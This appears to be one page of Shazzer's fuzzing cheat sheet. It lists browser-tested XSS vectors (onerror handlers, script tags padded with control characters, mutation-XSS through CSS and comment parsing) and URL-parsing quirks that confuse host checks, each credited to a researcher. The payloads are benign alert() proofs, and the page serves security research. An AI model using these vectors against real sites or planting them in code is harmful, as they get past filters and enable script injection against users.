Shazzer logo

    Cheat Sheet

    Generated payloads from fuzz test results. Filter by type, category, or browser.

    Found 153 vectors with results

    anchor.href='//example.com';0x0D
anchor.username = encodeURIComponent(String.fromCodePoint(33));0x0D
if(!/%/.test(anchor+''))alert(33)
    Author: hackvertor
    JSURL HandlingChromeFirefoxSafari
    anchor.href='//example.com';0x0D
anchor.username = encodeURIComponent(String.fromCodePoint(40));0x0D
if(!/%/.test(anchor+''))alert(40)
    Author: hackvertor
    JSURL HandlingChromeFirefoxSafari
    anchor.href='//example.com';0x0D
anchor.username = encodeURIComponent(String.fromCodePoint(41));0x0D
if(!/%/.test(anchor+''))alert(41)
    Author: hackvertor
    JSURL HandlingChromeFirefoxSafari
    anchor.href='//example.com';0x0D
anchor.username = encodeURIComponent(String.fromCodePoint(42));0x0D
if(!/%/.test(anchor+''))alert(42)
    Author: hackvertor
    JSURL HandlingChromeFirefoxSafari
    anchor.href='//example.com';0x0D
anchor.username = encodeURIComponent(String.fromCodePoint(45));0x0D
if(!/%/.test(anchor+''))alert(45)
    Author: hackvertor
    JSURL HandlingChromeFirefoxSafari
    <img src onerror=alert(61)>
    Author: c3l3si4n
    XSSDOM BehaviorChromeFirefox
    const x⟦09="x"0x0D
if(x==="x"){alert(9)}
    Author: 0x999-x
    JSJavaScript SyntaxChromeFirefox
    const x
="x"0x0D
if(x==="x"){alert(10)}
    Author: 0x999-x
    JSJavaScript SyntaxChromeFirefox
    const x0x0B="x"0x0D
if(x==="x"){alert(11)}
    Author: 0x999-x
    JSJavaScript SyntaxChromeFirefox
    const x0x0C="x"0x0D
if(x==="x"){alert(12)}
    Author: 0x999-x
    JSJavaScript SyntaxChromeFirefox
    const x0x0D="x"0x0D
if(x==="x"){alert(13)}
    Author: 0x999-x
    JSJavaScript SyntaxChromeFirefox
    <img src=x onerror=0x09alert(9)>
    Author: YouGina
    XSSDOM BehaviorFirefoxChrome
    <img src=x onerror=
alert(10)>
    Author: YouGina
    XSSDOM BehaviorFirefoxChrome
    <img src=x onerror=0x0Balert(11)>
    Author: YouGina
    XSSDOM BehaviorFirefoxChrome
    <img src=x onerror=0x0Calert(12)>
    Author: YouGina
    XSSDOM BehaviorFirefoxChrome
    <img src=x onerror=0x0Dalert(13)>
    Author: YouGina
    XSSDOM BehaviorFirefoxChrome
    <script0x09>alert(9)</script>
    Author: hansmach1ne
    XSSHTML ParsingChromeMicrosoft EdgeFirefox
    <script
>alert(10)</script>
    Author: hansmach1ne
    XSSHTML ParsingChromeMicrosoft EdgeFirefox
    <script0x0C>alert(12)</script>
    Author: hansmach1ne
    XSSHTML ParsingChromeMicrosoft EdgeFirefox
    <script0x0D>alert(13)</script>
    Author: hansmach1ne
    XSSHTML ParsingChromeMicrosoft EdgeFirefox
    <script >alert(32)</script>
    Author: hansmach1ne
    XSSHTML ParsingChromeMicrosoft EdgeFirefox
    <a href="/0x09/example2.com" id=x></a>
    Author: hackvertor
    XSSURL HandlingChromeFirefoxSafari
    <a href="/
/example2.com" id=x></a>
    Author: hackvertor
    XSSURL HandlingChromeFirefoxSafari
    <a href="/0x0D/example2.com" id=x></a>
    Author: hackvertor
    XSSURL HandlingChromeFirefoxSafari
    <a href="///example2.com" id=x></a>
    Author: hackvertor
    XSSURL HandlingChromeFirefoxSafari
    <a href="/\/example2.com" id=x></a>
    Author: hackvertor
    XSSURL HandlingChromeFirefoxSafari
    <a href="https://example2.com" id=x></a>
    Author: hackvertor
    XSSURL HandlingChromeFirefoxSafari
    <a href="https:\\example2.com" id=x></a>
    Author: hackvertor
    XSSURL HandlingChromeFirefoxSafari
    <a href="//0x09example2.com" id=x></a>
    Author: hackvertor
    XSSURL HandlingChromeFirefoxSafari
    <a href="//
example2.com" id=x></a>
    Author: hackvertor
    XSSURL HandlingChromeFirefoxSafari
    <a href="//0x0Dexample2.com" id=x></a>
    Author: hackvertor
    XSSURL HandlingChromeFirefoxSafari
    <a href="///example2.com" id=x></a>
    Author: hackvertor
    XSSURL HandlingChromeFirefoxSafari
    <a href="//@example2.com" id=x></a>
    Author: hackvertor
    XSSURL HandlingChromeFirefoxSafari
    <svg><style>0D⟧
x = "<![CDATA[</style><img title="]]]></style></svg><img src onerror=alert(93)>">
    Author: hackvertor
    XSSCSS ParsingChromeFirefoxSafari
    var markup = `<a0x09id=xss>shirley</a>`0x0D
var dom = new DOMParser().parseFromString(markup,'text/html')0x0D
0x0D
if(dom.getElementById('xss')){0x0D
     alert(9)0x0D
 }0x0D
0x0D
0x0D
    Author: Sudistark
    JSDOM BehaviorChrome
    var markup = `<a
id=xss>shirley</a>`0x0D
var dom = new DOMParser().parseFromString(markup,'text/html')0x0D
0x0D
if(dom.getElementById('xss')){0x0D
     alert(10)0x0D
 }0x0D
0x0D
0x0D
    Author: Sudistark
    JSDOM BehaviorChrome
    var markup = `<a0x0Cid=xss>shirley</a>`0x0D
var dom = new DOMParser().parseFromString(markup,'text/html')0x0D
0x0D
if(dom.getElementById('xss')){0x0D
     alert(12)0x0D
 }0x0D
0x0D
0x0D
    Author: Sudistark
    JSDOM BehaviorChrome
    var markup = `<a0x0Did=xss>shirley</a>`0x0D
var dom = new DOMParser().parseFromString(markup,'text/html')0x0D
0x0D
if(dom.getElementById('xss')){0x0D
     alert(13)0x0D
 }0x0D
0x0D
0x0D
    Author: Sudistark
    JSDOM BehaviorChrome
    var markup = `<a id=xss>shirley</a>`0x0D
var dom = new DOMParser().parseFromString(markup,'text/html')0x0D
0x0D
if(dom.getElementById('xss')){0x0D
     alert(32)0x0D
 }0x0D
0x0D
0x0D
    Author: Sudistark
    JSDOM BehaviorChrome
    if('1337' + String.fromCodePoint(9) + String.fromCodePoint(9) == 1337){alert(9)}
    Author: hansmach1ne
    JSCharacter EncodingChrome
    if('1337' + String.fromCodePoint(10) + String.fromCodePoint(10) == 1337){alert(10)}
    Author: hansmach1ne
    JSCharacter EncodingChrome
    if('1337' + String.fromCodePoint(11) + String.fromCodePoint(11) == 1337){alert(11)}
    Author: hansmach1ne
    JSCharacter EncodingChrome
    if('1337' + String.fromCodePoint(12) + String.fromCodePoint(12) == 1337){alert(12)}
    Author: hansmach1ne
    JSCharacter EncodingChrome
    if('1337' + String.fromCodePoint(13) + String.fromCodePoint(13) == 1337){alert(13)}
    Author: hansmach1ne
    JSCharacter EncodingChrome
    if (new URL("https://0x09google.com/endpoint").host=="google.com"){alert(9)}
    Author: InsertScript
    JSURL HandlingChromeFirefox
    if (new URL("https:///google.com/endpoint").host=="google.com"){alert(47)}
    Author: InsertScript
    JSURL HandlingChromeFirefox
    if (new URL("https://@google.com/endpoint").host=="google.com"){alert(64)}
    Author: InsertScript
    JSURL HandlingChromeFirefox
    if (new URL("https://\google.com/endpoint").host=="google.com"){alert(92)}
    Author: InsertScript
    JSURL HandlingChromeFirefox
    if (new URL("https://­google.com/endpoint").host=="google.com"){alert(173)}
    Author: InsertScript
    JSURL HandlingChromeFirefox
    prompt?.();alert(63)
    Author: felipecaon
    JSXSS ExecutionChromeMicrosoft Edge
    alert0x09();alert(9)
    Author: felipecaon
    JSXSS ExecutionChrome
    alert
();alert(10)
    Author: felipecaon
    JSXSS ExecutionChrome
    alert0x0B();alert(11)
    Author: felipecaon
    JSXSS ExecutionChrome
    alert0x0C();alert(12)
    Author: felipecaon
    JSXSS ExecutionChrome
    alert0x0D();alert(13)
    Author: felipecaon
    JSXSS ExecutionChrome
    eval('0x09alert(9)0x09')
    Author: m-boll
    JSJavaScript SyntaxFirefox
    eval('0x0Balert(11)0x0B')
    Author: m-boll
    JSJavaScript SyntaxFirefox
    eval('0x0Calert(12)0x0C')
    Author: m-boll
    JSJavaScript SyntaxFirefox
    eval(' alert(32) ')
    Author: m-boll
    JSJavaScript SyntaxFirefox
    eval(';alert(59);')
    Author: m-boll
    JSJavaScript SyntaxFirefox
    <div a="><!-- "></div><img src=x:x onerror=alert(34) -->
    Author: hackvertor
    XSSHTML ParsingChromeFirefoxSafari
    <div a='><!-- '></div><img src=x:x onerror=alert(39) -->
    Author: hackvertor
    XSSHTML ParsingChromeFirefoxSafari
    <div 0x09="><img src=x:x onerror=alert(9)>"></div>
    Author: hackvertor
    XSSDOM BehaviorChromeFirefoxSafari
    <div 
="><img src=x:x onerror=alert(10)>"></div>
    Author: hackvertor
    XSSDOM BehaviorChromeFirefoxSafari
    <div 0x0C="><img src=x:x onerror=alert(12)>"></div>
    Author: hackvertor
    XSSDOM BehaviorChromeFirefoxSafari
    <div 0x0D="><img src=x:x onerror=alert(13)>"></div>
    Author: hackvertor
    XSSDOM BehaviorChromeFirefoxSafari
    <div  ="><img src=x:x onerror=alert(32)>"></div>
    Author: hackvertor
    XSSDOM BehaviorChromeFirefoxSafari
    <div a="><!-- "></div><img src=x:x onerror=alert(34) -->
    Author: freddyb
    XSSHTML ParsingFirefoxSafariChrome
    <div a='><!-- '></div><img src=x:x onerror=alert(39) -->
    Author: freddyb
    XSSHTML ParsingFirefoxSafariChrome
    if (new URL("https://" + String.fromCodePoint(91) + "::ffff:7f00:1]/").hostname === '[::ffff:7f00:1]'){alert(91)}
    Author: d0ge
    JSURL HandlingFirefoxSafariChrome
    if (new URL("https://" + String.fromCodePoint(65095) + "::ffff:7f00:1]/").hostname === '[::ffff:7f00:1]'){alert(65095)}
    Author: d0ge
    JSURL HandlingFirefoxSafariChrome
    if (new URL("https://" + String.fromCodePoint(65339) + "::ffff:7f00:1]/").hostname === '[::ffff:7f00:1]'){alert(65339)}
    Author: d0ge
    JSURL HandlingFirefoxSafariChrome
    "0x091337"==1337&&alert(9)
    Author: hackvertor
    JSCharacter EncodingChromeFirefoxSafari
    "0x0B1337"==1337&&alert(11)
    Author: hackvertor
    JSCharacter EncodingChromeFirefoxSafari
    "0x0C1337"==1337&&alert(12)
    Author: hackvertor
    JSCharacter EncodingChromeFirefoxSafari
    " 1337"==1337&&alert(32)
    Author: hackvertor
    JSCharacter EncodingChromeFirefoxSafari
    "+1337"==1337&&alert(43)
    Author: hackvertor
    JSCharacter EncodingChromeFirefoxSafari

    Page 5 of 8

    « PrevNext »

    Distributed Fuzzing

    Enabled:
    Status:disconnected
    Your browser automatically contributes to distributed fuzzing when idle.